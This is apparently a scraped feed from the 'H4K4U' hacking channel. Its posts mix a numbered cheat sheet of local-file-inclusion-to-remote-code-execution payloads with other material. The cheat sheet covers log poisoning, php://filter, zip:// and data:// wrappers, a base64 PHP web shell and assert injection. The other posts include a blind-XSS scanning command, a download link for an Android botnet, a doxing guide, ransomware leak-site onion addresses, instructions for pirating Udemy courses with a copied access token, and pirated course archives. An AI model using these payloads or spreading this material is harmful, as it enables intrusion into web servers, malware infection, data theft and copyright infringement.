H4K4U
to learn the art programming you must read .And remember that hacker is always a good reader Not a. show off
๐ป Manage VPS and receive notifications via Telegram bot
I noticed a python script on GitHub that allows you to execute commands on your server through the Telegram bot and sends the results of the ex*****on.
Can be useful when executing long commands, especially if they require user interaction.
Link to GitHub
https://github.com/Drayko/Bot-Bounty
GitHub - Drayko/Bot-Bounty: Python Script for Telegram Bot is specially built for pentest & bug bounty. It's like a telegram shell. Python Script for Telegram Bot is specially built for pentest & bug bounty. It's like a telegram shell. - GitHub - Drayko/Bot-Bounty: Python Script for Telegram Bot is specially built for p...
DOWNLOAD ANY UDEMY COURSE DIRECTLY TO YOUR DRIVE OR TEAM DRIVE
1. You must have a Udemy account to follow this tutorial. Use your own account or use below method.
2. Now login into your Udemy account.
3. After you are logged in, right click anywhere on the udemy website and choose Inspect or you can press shortcut button F12.
4. Choose Application tab, then choose Cookies -> https://www.udemy.com or https://gale.udemy.com on the left.
5. On the right, type into filter: access_token , double click and copy the value inside Value box. Save this Access Token somewhere as you will need this later.
6. Now Download the Colab Notebook from the link given below.
Click Here: https:// dlsharefile. com/file/NjM2NGEzOWYt
7. After downloading the file go to https://colab.research.google.com and upload the file you downloaded above.
8. Now run the first, second and third cell one by one.
9. In the fourth cell fill all the details accordingly.
-First Enter the Url of the Course which you want to download.
-In Download_Dir enter the directory in which you want to download the course.
-In the Access_Token field enter the token you got in step 5.
-Only change it if you want to download subtitles in language other than English.
-Enter the quality in which you want to download course videos.
10. Click the play button and voila!!! It will start downloading the course in the directory you specified.
Note: If the size of the course is big, it may take some time to appear in your drive or team drive
Online Courses - Learn Anything, On Your Schedule | Udemy Udemy is an online learning and teaching marketplace with over 185,000 courses and 49 million students. Learn programming, marketing, data science and more.
COPERNIX
Worldwide map of geolocated Wikipedia
articles.
It's possible to enter the name of a locality to see articles about local streets or attractions.
Or enter a person's name to see what places are associated with him/her.
https://copernix.io
Copernix - Know thy World Explore the world using Wikipedia on a map. Copernix lets you search for information in a new, easy and intuitive way.
We Never Knew that our page is still Growing we want to increase the community and we wanted to communicate with all of you in single forum. So we are deciding to run our old server back, We need web developers
Interested memeber can mail us at
[email protected]
ROGUE V6.2 ANDROID BOTNET PREMIUM
https://anonfiles.com/7755nep0y8/Rogue_v6.2_rar
https://github.com/tracelabs/tlosint-live
GitHub - tracelabs/tlosint-live: Trace Labs OSINT Linux Distribution based on Kali. Trace Labs OSINT Linux Distribution based on Kali. - GitHub - tracelabs/tlosint-live: Trace Labs OSINT Linux Distribution based on Kali.
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent:
โโโโโโโโโโโโโโโโโโโ
2. SSH Log Poisoning
ssh ''com
/show.php?file=/var/log/auth.log&c=ls
โโโโโโโโโโโโโโโโโโโ
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:
RCPT TO:
/show.php?file=/var/log/mail.log&c=ls
โโโโโโโโโโโโโโโโโโโ
4. Image Upload
i. Add this to EXIF data of s.png:
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
โโโโโโโโโโโโโโโโโโโ
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent:
If no success then try writing files.
โโโโโโโโโโโโโโโโโโโ
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
โโโโโโโโโโโโโโโโโโโ
7. Zip upload
echo "" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
โโโโโโโโโโโโโโโโโโโ
8. data://text/plain:
/show.php?file=data://text/plain,
/show.php?file=data://text/plain,
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
โโโโโโโโโโโโโโโโโโโ
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
โโโโโโโโโโโโโโโโโโโ
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
โโโโโโโโโโโโโโโโโโโ
11. expect://
/show.php?page=expect://ls
โโโโโโโโโโโโโโโโโโโ
12. input://
POST /index.php?page=php://input HTTP/1.1
โโโโโโโโโโโโโโโโโโโ
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
โโโโโโโโโโโโโโโโโโโ
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
โโโโโโโโโโโโโโโโโโโ
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
โโโโโโโโโโโโโโโโโโโ
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
โโโโโโโโโโโโโโโโโโโ
17. To automate, Use LFISuite.
โโโโโโโโโโโโโโโโโโโ
Upgrade from LFI to RCE via PHP Sessions I recently came across an interesting Local File Inclusion vulnerability in a private bug bounty program which I was able to upgrade to a Remote Code Ex*****on. The interesting fact about this and what makes it different is that the underlying operating system was pretty hardened and almost all usua...
แดแดสษชแดแดส สแดแดแดษชษดษข แด ษชแด
แดแดs
แดแดแดแดส สแดาแดสแด แดสแด สษชษดแด แดxแดษชสแดแด
แด
แดแดกษดสแดแดแด
สษชษดแด :-
http://www.mediafire.com/download/492h7o887yxexha/PT+and+EH+with+Kali+Linux.rar
http://www.mediafire.com/download/5tex1gndiis0rz3/Reconnaissance+-+Footprinting.rar
Reconnaissance/Footprinting
๐บhttp://www.mediafire.com/download/492h7o887yxexha/PT+and+EH+with+Kali+Linux.rar
Introduction to Pentesting and Ethical Hacking with Kali Linux
04. ๐บhttp://www.mediafire.com/download/1bap7hf82clm9dy/SQL+Injection.rar
SQL Injection
05. ๐บhttp://www.mediafire.com/download/22t74lyof149u41/Scanning+networks.rar
Scanning Networks
06. ๐บhttp://www.mediafire.com/download/h285291nt7w8trh/Enumeration.rar
Enumeration
07. ๐บhttp://www.mediafire.com/download/g4di658xb9stz8g/Pentesting+Web+Servers.rar
Hacking Web Servers
08. ๐บhttp://www.mediafire.com/download/waqslt6jhk6ph1a/Pentesting+Web+Applications.rar
Hacking Web Applications
09. ๐บhttp://www.mediafire.com/download/1cujirp51m911k8/Cryptography.rar
Cryptography
10. ๐บhttp://www.mediafire.com/download/fzbq3zzzqspzw15/Sniffing.rar
Sniffing
11. ๐บhttp://www.mediafire.com/download/5irzrhub4r6mva3/Session+Hijacking.rar
Session Hijacking
12. ๐บhttp://www.mediafire.com/download/2xqgt9g7044n683/Social+Engineering.rar
Social Engineering
13. http://www.mediafire.com/download/zf2d20969azd887/System+hacking.rar
System Hacking
14. http://www.mediafire.com/download/x5zxdvv1h3k54nk/Denial+of+Service.rar
Denial of Service
15. http://www.mediafire.com/download/r9hrz8zotis74f1/Hacking+wireless+networks.rar
Hacking Wireless Networks
16. http://www.mediafire.com/download/8caooodccdnc608/Malware+threats.rar
Malware Threats
17. http://www.mediafire.com/download/33z5epburhu1xgy/Evading+IDS%2C+Firewalls%2C+and+Honeypots.rar
Evading IDS, Firewalls, and Honeypots
18. http://www.mediafire.com/download/l45v3ne52qr9llw/Mobile+platforms.rar
Hacking Mobile Platforms
19. http://www.mediafire.com/download/2kczrn29gt6fdp3/Introduction+to+Firewalls.rar
Introduction to Firewalls
20. http://www.mediafire.com/download/t98r47bpo9hy5n1/Introduction+to+browser+security+headers.rar
Introduction to browser security headers
21. http://www.mediafire.com/download/ou45m7o4xqt1qdu/Introduction+to+Wireshark.rar
Introduction to Wireshark
22. http://www.mediafire.com/download/n5exc1bomahud9m/Troubleshooting+with+Wireshark+Fundamental+Protocol+Analysis.rar
Troubleshooting with Wireshark
80. http://www.mediafire.com/download/n98viipaz131fhq/Wireshark+2.0.rar
Wireshark 2.0
82. http://www.mediafire.com/download/3guhkfrhfbvs01b/NMAP.rar
Network Security Testing with Nmap
23. http://www.mediafire.com/download/sbst1evvisywe62/Buffer+Overflow.rar
All about buffer overflows
24. http://www.mediafire.com/download/7rq1ujn9424d3hb/Network+PT+Using+Python+and+K_4li+Linux.rar
Network Pentesting using Python and Kali linux
25. http://www.mediafire.com/download/mnulcdbw817f9q0/Metasploit+Basics.rar
Metasploit Basics
26. http://www.mediafire.com/download/qchaazzxrdsmwja/CloudFlare+Security.rar
CloudFlare Security
27. http://www.mediafire.com/download/1qqm5pcj6pz37wn/Hack+your+API+First.rar
Hack your API first
28. http://www.mediafire.com/download/roaeau041zx8byx/SSCP%3B+Risk+Identification%2C+Monitoring%2C+and+Analysis.rar
SSCP: Risk Identification, Monitoring, and Analysis
29. http://www.mediafire.com/download/ysvx972ymd57gme/Check+Point+Certified+Security+Administrator%3B+Install+%26+Deploy.rar
Check Point Certified Security Administrator; Install & Deploy
73. http://www.mediafire.com/download/ka9qu9136x8on4j/Cloud+security.rar
Cloud Security
79. http://www.mediafire.com/download/6ctvkguxr9g4609/Cloud+computing.rar
Cloud Computing
74. http://www.mediafire.com/download/5ut59in0l6okeaq/Introduction+to+Penetration+Testing+Using+Metasploit.rar
MediaFire MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
hpAndro Vulnerable Application Challenges
part 1 - https://nibarius.github.io/learning-frida/2021/08/26/hpandro-part1
part 2 - https://nibarius.github.io/learning-frida/2021/08/28/hpandro-part2
part 3 - https://nibarius.github.io/learning-frida/2021/08/29/hpandro-hidden-levels
hpAndro Vulnerable Application Challenges - part 1 hpAndro Vulnerable Application is an Android CTF with a lot of challenges (100 at the time of writing) and new challenges are added every now and then. The challenges are based on the OWASP Mobile Security Testing Guide and there are many different types of challenges available. Iโve solved all th...
https://freetraining.dfirdiva.com/
For more underground infosec stuff
https://discord.gg/zFSamRn
Join the H4k4U { H4CK3R LI8R4RY } Discord Server! Check out the H4k4U { H4CK3R LI8R4RY } community on Discord - hang out with 72 other members and enjoy free voice and text chat.
Hitchhikers guide of anonymity + many more
https://anonymousplanet.org/guide.html
For. More cool stuff
Join - https://discord.gg/KeQs85mh
The Hitchhikerโs Guide to Online Anonymity The Hitchhikerโs Guide to Online Anonymity
After one year we can proudly say that we are back and opening our gates of most extensive hacking library of all time ( H4K4U) where almost every resources are available for any hacker, Researcher, infosec geek on our discord library. Discord server is big so it can take time to open all channels so stay connected.
Invite link
https://discord.gg/KeQs85mh
Tell Them We Are Back
SHARE as Much as YOU CAN
Join the H4k4U { H4CK3R LI8R4RY } Discord Server! Check out the H4k4U { H4CK3R LI8R4RY } community on Discord - hang out with 49 other members and enjoy free voice and text chat.
Find Reflected, Blind and DOM XSS with Dalfox and Burp Suite
We collect a list of site URLs and place them in the urls_list.txt file. Then, to search for Blind XSS, register on the site xsshunter.com and get a link of the form shadow.xss.ht, where your nickname will be in place of "shadow".
Use the command below to find XSS using Dalfox and send each request to Burp Suite for manual testing:
dalfox file urls_list.txt --mining-dom --deep-domxss --ignore-return -b '"> ' --follow-redirects --proxy http: //127.0.0.1:8080
1. Analysis for the REvil Ransomware payload found in the Kaseya incident
https://chuongdong.com/reverse%20engineering/2021/07/11/REvilRansomware
2. BIOPASS RAT:
New Malware Sniffs Victims via Live Streaming
https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
Hackers Spread BIOPASS Malware via Chinese Online Gambling
REvil Ransomware Malware Analysis Report - REvil Ransomware
Doxing God
https://anonfiles.com/ff49ec28ua/God_Doxing_and_anonymity_pdf
Leaked source code
http://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion/content/3
Jackpot
https://drive.google.com/drive/folders/1aoRMOqhVRjTSSGvDSW_36VRur_Iv5k-P
CIA related UFO records declassified and released. 'All' US govt documents on UFOs are now searchable.
2,700 pages of information collected and recorded by the US govt regarding UFOs. The documents date back as far as the 1980s.
https://www.theblackvault.com/documentarchive/ufos-the-central-intelligence-agency-cia-collection/
UFOs: The Central Intelligence Agency (CIA) Collection - The Black Vault Background Below you will find a collection of CIA related UFO records. The Black Vaultโs connection to the CIA in getting some of these UFO documents released goes back to 1996. Originally, the CIA would only release about 1,000 pages that had been previously disclosed after a FOIA court case in ...
A selection of services for anonymous file transfer
Let's say you have a need to secretly send a large file to an equally large audience. How can you send it anonymously without leaving a trace? We have made for you a selection of the best anonymous file hosting services in the clearnet.
Selection:
โช๏ธ privatlab.com
โช๏ธ anonfiles.com
โช๏ธ wetransfer.com
โช๏ธ onionshare.org
โช๏ธ dropmefiles.com
โช๏ธ filedropper.com
โช๏ธ anonymousfiles.io
All information is provided for informational purposes only. We are not responsible for your actions.
PrivatLab - temporary mail, privnote, file upload storage temporary mail, privnote, file upload storage
Fake ROOT rights
Hello everyone.
Probably everyone has encountered such a problem when a utility is needed, but it requires root rights, which you do not have, and it also often happens that it is difficult and even completely impossible to root for a certain device.
Well, I found a solution, we will emulate the root using one utility, but I immediately warn you that the method does not work with all programs.
Installation:
โช๏ธapt update -y
โช๏ธapt upgrade -y
โช๏ธapt install git
โช๏ธgit clone https://github.com/B41B4L/FakeRoot
โช๏ธcd FakeRoot
โช๏ธchmod + x Root.sh
Using:
โช๏ธ. / Root.sh - launch the utility
Done, for verification, we can write the command:
โช๏ธwhoami
The result should be like this - root
There is also an alternative installation method:
โช๏ธpkg install fakeroot
And to activate the Route mode, we always write the command:
โช๏ธfakeroot
You can somehow deceive the system, but if there is a possibility, then it's worth spending some amount of time and finally putting normal Ruth rights.
Our chat ๐ฌ
All information is provided for informational purposes only. We are not responsible for your actions.
B41B4L/RootProot Fake Root Termux. Contribute to B41B4L/RootProot development by creating an account on GitHub.
RELEASE: Over 13,500 files hacked from Sberbank of Russia's translation bureau, providing a unique insight into the interests of the bank and its clients. Among other items, translations include political analysis, military sales and open source reporting.
https://ddosecrets.com/wiki/Sberbank_of_Russia
Sberbank of Russia - Distributed Denial of Secrets Over 13,500 files hacked from Sberbank of Russia's translation bureau, providing a unique insight into the interests of the bank and its clients. Among other items, translations include political analysis, military sales and open source reporting.
ransomware leak
http://hxt254aygrsziejn.onion
hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion
wqmfzni2nvbbpk25.onion/partners.html
nbzzb6sa6xuura2z.onion
http://avaddongun7rngel.onion
http://darksidedxcftmqa.onion
http://p6o7m73ujalhgkiv.onion
http://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion
http://egregoranrmzapcv.onion
http://rgleak7op734elep.onion
http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion
http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion
http://ixltdyumdlthrtgx.onion
http://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion
http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion
mountnewsokhwilx.onion
http://lockbitkodidilol.onion
http://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion
http://cuba4mp6ximo2zlo.onion
http://ekbgzchl6x2ias37.onion
wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion
http://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion
http://pysa2bitc5ldeyfak4seeruqymqs4sj5wt5qkcq7aoyg4h2acqieywad.onion
http://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmql55tvgqad.onion
http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd.onion
http://rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onion
Corporate Leaks 0 Seven Seas. Part 1. Posted on April 7, 2021 by site_admin sevenseas_part_1.7zsevenseas_part_1.txt Headquarters: Dubai Investments Park, Plot 598-668, Dubai, Dubai, United Arab EmiratesPhone: +971 4 803 3333Website: www.sevenseasgroup.comEmployees: 1,000Revenue: $326 Million Seven Seas
Our YouTube content will be lost shortly we got two communities guidelines strikes. We tried our best to serve you guys but to be honest we can not fight with the existing system and monopoly of big gaints though we are still active on TOR
Hello everyone unfortunately we are banned to upload the content on YouTube due to its community guidelines. We have many request to open our discord library again, Though we are opening the gates of our H4K4U The Extensive Hacker library on discord where update each day new stuff with content related to infosec leaks, news, exploits, tool, CVE, latest working onion links, courses and everything which need you to grown in infosec careers. We recommend you to join official discord with Paid membership.
Life Time Full Server Access - $10
You can pay through PayPal via
https://www.paypal.me/7H3H4WK
Once you pay via PayPal send the screen shot of payment and DM us on our page or you can send your payment details by email on
[email protected]
( Server verification can take 24 hours after we reach you and confirm your real I'd with payment )
We bring the information at one place so that you don't have to recon at another place. We will bring information each day and before anyone else on planet.
YouTube Community Strike
Thanks hater for striking on video and the content
We have to create our own platform no option left
I thank you all who supported me and subscribed my YouTube channel and even from the time of discord...
Its not about or but its all about fuzzing with in the or webapp and looking for each vulnerable parameter and hunt for bugs
Another POC on
https://youtu.be/ITP09y12CSA
Cross-Site-Script POC | #XSS | #Reflectedxss POC | #xss | #bugbounty | #WAPT #Burpsuitpro | #h4k4u Cross-site scripting is a type of security vulnerability typically found in web applications. attacks enable attackers to inject client-side scripts int...
Hello everyone i am back with another tutorial where we gonna learn about Web Pen testing & recon process and finding some critical files on web server which can lead to some serious information exposer
1 Installing active scan ++ on burp pro & Using it for web recon process
2 using Dirsearch + paramspider
3 Finding critical files on server (including htaacess + log files)
Though i can use inturder too in burp but not in this demo
https://youtu.be/ejRLy_nhmLQ
#CriticalFileFound | #SensitiveDataExposure | #BurpSuit #ActiveScan ++ | #Paramspider + #DirSearch is a mature command-line tool designed to directories and files in . ++ extends Burp Suite's active and passive s...
https://lucasteske.dev/2019/12/creating-your-own-gsm-network-with-limesdr/
Creating your own GSM Network with LimeSDR | Lets Hack It Creating your own GSM Network with LimeSDR DISCLAIMER: This procedure is highly ilegal basically anywhere in the world. Be sure to run this in a closed RF environment (aka Faraday Cage) This article works with any LimeSDR version. For this example we will use the Osmocom GSM Stack in the...
ok so after a long time i am back with some python tutorials for bgnr on variables in python
https://youtu.be/S9y7GkduRiU
#Python #Variable | #DataTypes in #Python | Back to Basic | EP.5 A is a reserved memory location to store values. In other words, a variable in a python program gives data to the computer for processing. ...